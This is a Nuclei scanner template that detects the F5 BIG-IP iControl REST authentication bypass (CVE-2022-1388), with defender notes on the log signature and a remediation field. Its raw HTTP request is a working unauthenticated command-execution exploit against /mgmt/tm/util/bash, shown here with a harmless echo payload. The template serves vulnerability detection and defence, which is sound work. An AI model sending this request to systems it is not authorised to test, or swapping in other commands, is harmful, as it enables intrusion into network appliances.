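---
# Nuclei template for CVE-2022-1388 (F5 BIG-IP iControl REST authentication
# bypass). The probe only runs `echo` with a random marker; the template
# reports a hit when that marker is echoed back in a 200 response, i.e. when
# the appliance executed the supplied command without valid credentials.
#
# Defender notes: the request shape below is also the signature to hunt for in
# management-interface logs — a POST to /mgmt/tm/util/bash whose Connection
# header lists X-F5-Auth-Token next to keep-alive, sent with a Basic
# Authorization header and a placeholder X-F5-Auth-Token value.
id: bigip-icontrol-rest-rce

info:
  name: F5 BIG-IP iControl REST Panel RCE
  author: twitter.com/numanturle
  severity: critical
  description: >-
    Detects an F5 BIG-IP iControl REST endpoint that accepts a request to
    /mgmt/tm/util/bash without valid authentication and executes the supplied
    command (CVE-2022-1388). A match means the host is still exposed and
    should be treated as potentially compromised until reviewed.
  remediation: >-
    Apply the vendor fix for CVE-2022-1388 and restrict access to the iControl
    REST / management interface to trusted management networks only.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2022-1388
  tags: CVE-2022-1388

requests:
  # Raw request is kept verbatim; `|+` preserves the blank line that separates
  # the HTTP headers from the JSON body. Comments cannot go inside the block
  # scalar because they would become part of the request bytes.
  - raw:
      - |+
        POST /mgmt/tm/util/bash HTTP/1.1
        Host: localhost
        Connection: keep-alive, X-F5-Auth-Token
        Authorization: Basic YWRtaW46
        X-F5-Auth-Token: rrr
        X-Forwarded-For: localhost
        Referer: localhost
        Content-Length: 39

        {"command":"run","utilCmdArgs":"-c echo {{randstr}}"}

    # Both matchers must hit: a 200 alone is not enough — the random marker has
    # to come back in the body, which rules out generic 200 error pages.
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "{{randstr}}"
        part: body
        condition: and
      - type: status
        status:
          - 200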